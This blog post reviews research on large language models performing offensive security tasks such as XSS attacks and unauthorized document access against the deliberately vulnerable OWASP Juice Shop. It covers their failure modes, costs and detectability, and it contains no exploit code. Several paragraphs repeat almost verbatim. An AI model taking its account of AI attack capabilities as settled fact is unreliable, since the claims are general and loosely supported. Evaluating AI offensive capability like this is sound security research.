Harnessing AI for Cyber Offense: The Potential and Pitfalls of Large Language Models in Modern Cybersecurity

Reviewing the Research: LLMs in Offensive Cybersecurity
I reviewed the OWASP LLM Exploit Generation report and conducted independent research to assess the real-world viability of Large Language Models (LLMs) in offensive cybersecurity. While LLMs can assist in certain hacking tasks— like generating payloads or automating parts of vulnerability research — the process is far from seamless. Successful exploitation still requires human oversight, technical expertise, and iterative trial-and-error. Current AI-driven attacks remain noisy, inefficient, and highly dependent on well-structured prompts. In short, while LLMs may one day reshape offensive security, they are not yet an automated hacking solution for low-skill attackers. The hype outweighs the reality—for now.
Exploring the Role of Large Language Models in Offensive Cybersecurity
With the advancement of technology, the cybersecurity landscape continues to evolve. Large Language Models (LLMs), such as GPT-4o and Claude, are garnering attention for their potential applications in offensive cybersecurity. While initial research indicates these models can automate vulnerability exploitation, questions remain regarding their practicality and efficiency. Security experts are probing whether LLMs can genuinely offer new capabilities for hackers or if they are merely an overhyped tool with limited usability. Our study delves into the challenges and opportunities presented by LLMs in executing complex cyber attacks, using the OWASP Juice Shop as a testing ground.
Experimental Design and Results
The study explored several tasks within the OWASP Juice Shop environment, utilizing advanced LLMs for exercises such as DOM XSS attacks and exploiting user feedback loops. The selected tasks varied in complexity, targeting vulnerabilities that could simulate real-world cyber threats. Setting up the Juice Shop required a fork of the Cybench repository, with specific configurations to ensure cloud compatibility. During these operations, LLMs were employed for generating detailed exploit instructions, revealing their potential and notable flaws, especially with less straightforward objectives.
This deliberate task selection aimed to uncover the nuances in LLM capabilities, highlighting discrepancies between model performance levels. LLMs executed operations like accessing confidential documents, posting feedback under another user's name, and performing DOM and reflected XSS attacks. Each task bore similarity to genuine security challenges, assessing how these models might fare against tangible vulnerabilities.

Setting up the experiment required extensive groundwork. Forking the Cybench repository enabled the creation of a tailored testing framework that supported interaction with the Juice Shop. This involved installing necessary software and coordinating resources across AWS and GCP for seamless workload distribution. Each model had the appropriate context and tools to attempt solving the assigned tasks, providing a sandbox for monitoring their effectiveness.
The setup offered fascinating insights into both the strengths and weaknesses of LLMs in offensive cybersecurity. While models like GPT-4o displayed prowess in generating attack scenarios and identifying vulnerabilities, challenges emerged with complex tasks lacking well-defined solutions. This underscores a critical observation: LLMs operate within a boundary of guided problem-solving, often struggling when creativity and adaptation are required beyond their trained comprehension.
Selected OWASP Juice Shop Tasks
The study tested various tasks within the OWASP Juice Shop environment, again utilizing advanced LLMs for exercises like DOM XSS attacks and exploiting feedback loops. These tasks varied in complexity, targeting vulnerabilities reminiscent of real-world cyber threats. Setting up Juice Shop required a fork of the Cybench repository, with specific configurations to ensure cloud compatibility. Throughout these operations, LLMs generated detailed exploit instructions, offering insights into their capacity to overcome specific security features but also revealing notable limitations.
Delving into LLMs' application within the OWASP Juice Shop tasks illuminated several facets of their operational capabilities and limitations. By targeting vulnerabilities commonly exploited in real-world scenarios, the study pushed these models to their logical extremes in hacking challenges. Tasks like DOM XSS attacks and manipulating feedback loops evaluated how well LLMs could mimic actions by malicious agents with advanced knowledge, yet operating on less clear directives.
Preparing for this experimental setup was no trivial task. It required creating a bespoke testing framework by modifying the existing Cybench repository, ensuring seamless alignment with the Juice Shop's simulated web application vulnerabilities. This involved installing essential software and setting up a compatible infrastructure across AWS and GCP platforms. The cloud environment configuration facilitated a sandbox-like setting where LLMs could be observed while navigating tasks.
Throughout these exercises, models like GPT-4o and Claude demonstrated proficiency in generating attack vectors akin to sophisticated hacking maneuvers. Nonetheless, limitations emerged, particularly when tasked with problem-solving beyond pre-structured guidelines or predefined objectives. This revealed intrinsic challenges related to autonomy and adaptability, indicating that while LLMs offer advanced capabilities, their potential in cybersecurity applications remains somewhat bounded by the explicitness of training and directives.
Key Observations
The experimentation with LLMs uncovered critical challenges and insights. Notably, the models' rigid goals occasionally caused them to overlook more significant security issues. A notable observation was the 'Searching for Tin, Ignoring Gold' phenomenon, where LLMs, while chasing specific tasks, missed crucial vulnerabilities like SQL injection.
The researchers encountered 'Installation Loops,' a specific operational challenge where systems cycled through repeated actions without achieving intended results. This often stemmed from integration problems with software dependencies, consuming time and compute resources without meaningful outcomes. For instance, aligning Selenium with outdated web drivers created endless loops that failed to progress.

Similarly, their economic analysis highlighted another layer of complexity. While infrastructure costs were manageable, the human resources required were not. The level of expertise needed to effectively harness these LLMs posed a significant barrier, especially for less-skilled operators. In the study, 82 developer hours were required to devise offensive strategies for five Juice Shop tasks, illustrating the steep expertise and operational costs.
These observations underscore the sophistication needed to skillfully leverage LLMs. The inherent expertise barrier reduces their practicality for low-skill cyber actors, indicating that while LLMs have potential, they are best suited for augmenting the skills of experienced penetration testers rather than democratizing complex offensive cyber capabilities.
Implications for LLM-Based Hacking
LLM-based hacking tools present significant implications for the cybersecurity domain. Expert domain knowledge remains crucial despite LLMs' technical prowess, given their requirement for precise guidance in executing multi-step tasks. During our experiments, we noted that while LLMs demonstrated significant potential, they required expert input to adaptively tackle complex hacking challenges, underscoring a need for seasoned oversight.
Moreover, LLM performance varies significantly across different security tasks—excelling in one area may falter in another, necessitating multi-model solutions for comprehensive security assessments. Certain LLMs might excel in web application security, while others may perform better with scripting or network vulnerabilities. This disparity indicates that no single model currently offers a universal solution across all cybersecurity needs, emphasizing tailored approaches.
Operationally, LLM use is not inherently stealthy due to substantial network traffic, making them detectable by existing security measures. The high volume of network transactions, resultant noise, and repetitive processes make it challenging to use LLMs without attracting attention. This limits their applicability for stealth-focused cyber operations, suggesting attackers may need additional tools or techniques to reduce detectability.
While LLMs hold promise in aiding skilled human hackers, the challenge remains in automating sophisticated vulnerabilities without manual oversight. Ultimately, although LLMs can enhance the toolkit of an experienced attacker, their current reliance on human-driven processes diminishes their ability to autonomously execute complex offensive operations without expert intervention.
Conclusions
In conclusion, while LLMs have demonstrated potential in executing certain offensive cybersecurity tasks, they present substantial limitations. The current landscape suggests that LLMs can enhance skilled security professionals' efforts rather than replace traditional tools or empower novice hackers. The requirement for advanced models and significant domain expertise remains a barrier to entry. Future endeavors should focus on improving LLM capabilities and refining operational methodologies to overcome obstacles effectively. As the technology evolves, the cybersecurity community will continue to grapple with its implications, balancing innovation with practicality.
Nate W (aka GreyFriar)
Cybersecurity Analyst | AI & Security Trends | n8n Agentic Workflows
🔗 LinkedIn: Nate W
🕵️ Blog: AI Security Research
✍️ Medium: @greyfriar
🐦 X (Twitter): @etcpwd13
👉 Do me a favor—if you found this post useful, give it a like or share! It helps out a lot.
Member discussion